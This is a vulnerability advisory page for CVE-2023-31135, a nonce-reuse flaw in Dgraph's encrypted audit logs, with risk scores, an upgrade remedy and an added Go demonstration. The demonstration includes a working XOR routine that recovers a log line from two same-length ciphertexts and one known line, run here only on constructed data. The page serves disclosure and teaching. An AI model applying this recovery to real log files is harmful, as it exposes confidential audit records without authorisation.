SCA: security update for github.com/dgraph-io/dgraph (GHSA-92wq-q9pq-gw47)

medium Tenable Cloud Security Plugin ID 412973

Description

There are packages installed that are affected by a vulnerability referenced in the following CVE:

- Dgraph is an open source distributed GraphQL database. Audit logs written by affected versions of Dgraph are exposed to ciphertext analysis because the encryption nonce is reused. Each 16-byte nonce is built from a 12-byte baseIv, fixed when the audit log file is created, followed by 4 bytes holding the length of the log line being encrypted. Log lines frequently have the same length, so many lines in the same file are encrypted under the same key and the same nonce, and an attacker who obtains the file can combine those ciphertexts to recover information about the plaintext without the key. All audit logs generated by versions of Dgraph earlier than v23.0.0 are affected; upgrading protects logs written from then on but does not re-protect logs already on disk. An attacker needs access to the system the logs are stored on. Dgraph users should upgrade to v23.0.0. Users who cannot upgrade should move existing audit logs to a secure location and, for additional protection, encrypt them with an external tool such as `gpg`. (CVE-2023-31135)
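The following Go program is an added example, not Dgraph's code, that reproduces the nonce derivation the description gives (12-byte per-file baseIv plus the 4-byte line length) and shows why it matters: two audit lines of equal length get the same nonce, and with the same key that means the same keystream, so an attacker holding the log file and one known line recovers the other line by XOR alone. It assumes AES-GCM (the page describes only the nonce layout, not the cipher mode), a constructed demo key, a constructed baseIv, and two constructed sample log lines. The `EncryptUnique` function illustrates a per-record random nonce as the general remedy; it is not the specific change shipped in v23.0.0.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"fmt"
)

// nonceSize matches the layout the advisory describes: 12 bytes of baseIv
// followed by 4 bytes of line length.
const nonceSize = 16

// newGCM builds AES-GCM with a 16-byte nonce. AES-GCM is an assumption here;
// the advisory describes the nonce layout, not the cipher mode.
func newGCM(key []byte) cipher.AEAD {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	aead, err := cipher.NewGCMWithNonceSize(block, nonceSize)
	if err != nil {
		panic(err)
	}
	return aead
}

// LengthNonce reproduces the weak derivation: a per-file baseIv plus the
// big-endian length of the line. Two lines of equal length get the same nonce.
func LengthNonce(baseIV, line []byte) []byte {
	nonce := make([]byte, nonceSize)
	copy(nonce, baseIV[:12])
	binary.BigEndian.PutUint32(nonce[12:], uint32(len(line)))
	return nonce
}

// EncryptWeak seals one log line under the length-derived nonce (no AAD).
func EncryptWeak(aead cipher.AEAD, baseIV, line []byte) []byte {
	return aead.Seal(nil, LengthNonce(baseIV, line), line, nil)
}

// RecoverFromNonceReuse is the attacker's side. GCM encrypts with a keystream
// derived from (key, nonce), so two lines sealed under the same nonce satisfy
// ct1 XOR ct2 == pt1 XOR pt2. Knowing one plaintext line yields the other
// without the key. Only the ciphertext body is used; the trailing tag is ignored.
func RecoverFromNonceReuse(ctKnown, ctTarget, ptKnown []byte) []byte {
	out := make([]byte, len(ptKnown))
	for i := range ptKnown {
		out[i] = ctKnown[i] ^ ctTarget[i] ^ ptKnown[i]
	}
	return out
}

// EncryptUnique prepends a fresh random nonce to every sealed line, so equal
// lengths (or equal contents) no longer produce equal nonces. This shows a
// per-record unique nonce in general; it is not the change shipped in v23.0.0.
func EncryptUnique(aead cipher.AEAD, line []byte) []byte {
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		panic(err)
	}
	return append(nonce, aead.Seal(nil, nonce, line, nil)...)
}

// DecryptUnique reverses EncryptUnique.
func DecryptUnique(aead cipher.AEAD, record []byte) ([]byte, error) {
	return aead.Open(nil, record[:nonceSize], record[nonceSize:], nil)
}

// Demo runs both paths over two constructed audit lines of equal length. It
// returns the line the attacker recovers from the weak path, whether two
// unique-nonce records of the same line differ, and the round-tripped plaintext.
func Demo() (recovered []byte, uniqueRecordsDiffer bool, roundTrip []byte) {
	key := bytes.Repeat([]byte{0x42}, 32)                // constructed demo key
	baseIV := []byte("dgraph-audit")                     // constructed 12-byte per-file baseIv
	known := []byte("user=alice op=query ns=0001 ok=1")  // constructed line the attacker knows
	target := []byte("user=bob   op=mutat ns=0007 ok=0") // constructed line the attacker wants
	if len(known) != len(target) {
		panic("demo lines must have equal length to collide")
	}
	aead := newGCM(key)

	ctKnown := EncryptWeak(aead, baseIV, known)
	ctTarget := EncryptWeak(aead, baseIV, target)
	recovered = RecoverFromNonceReuse(ctKnown, ctTarget, known)

	r1 := EncryptUnique(aead, target)
	r2 := EncryptUnique(aead, target)
	uniqueRecordsDiffer = !bytes.Equal(r1, r2)
	var err error
	roundTrip, err = DecryptUnique(aead, r1)
	if err != nil {
		panic(err)
	}
	return recovered, uniqueRecordsDiffer, roundTrip
}

func main() {
	recovered, differ, rt := Demo()
	fmt.Printf("recovered under nonce reuse: %q\n", recovered)
	fmt.Printf("unique-nonce records differ: %v, round trip: %q\n", differ, rt)
}
```

The attack needs no brute force: the XOR step is a single pass over the ciphertext, which is why the CVSS vector rates attack complexity as low once local access to the log file is in hand. Any scheme where the nonce is a deterministic function of the plaintext length will collide as soon as two records share a length, so the check to make on similar designs is whether the nonce is unique per record (counter or random) rather than per file.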

See Also

https://github.com/advisories/GHSA-92wq-q9pq-gw47

Plugin Details

Severity: Medium

ID: 412973

Version: Revision 1.4

Type: Local

Family: SCA Checks

Published: 1/23/2025

Updated: 8/20/2025

Supported Sensors: Tenable Cloud Security, Tenable Self-Hosted Container Security

Risk Information

VPR

Risk Factor: Low

Score: 3

Percentile: 23.51

Vendor

Vendor Severity: Medium

CVSS v2

Risk Factor: Medium

Base Score: 4.6

Temporal Score: 3.4

Vector: CVSS2#AV:L/AC:L/Au:S/C:C/I:N/A:N

CVSS Score Source: CVE-2023-31135

CVSS v3

Risk Factor: Medium

Base Score: 5.5

Temporal Score: 4.8

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

Exploit Ease: No known exploits are available

Patch Publication Date: 5/17/2023

Vulnerability Publication Date: 5/17/2023

Reference Information

CVE: CVE-2023-31135

CWE: CWE-326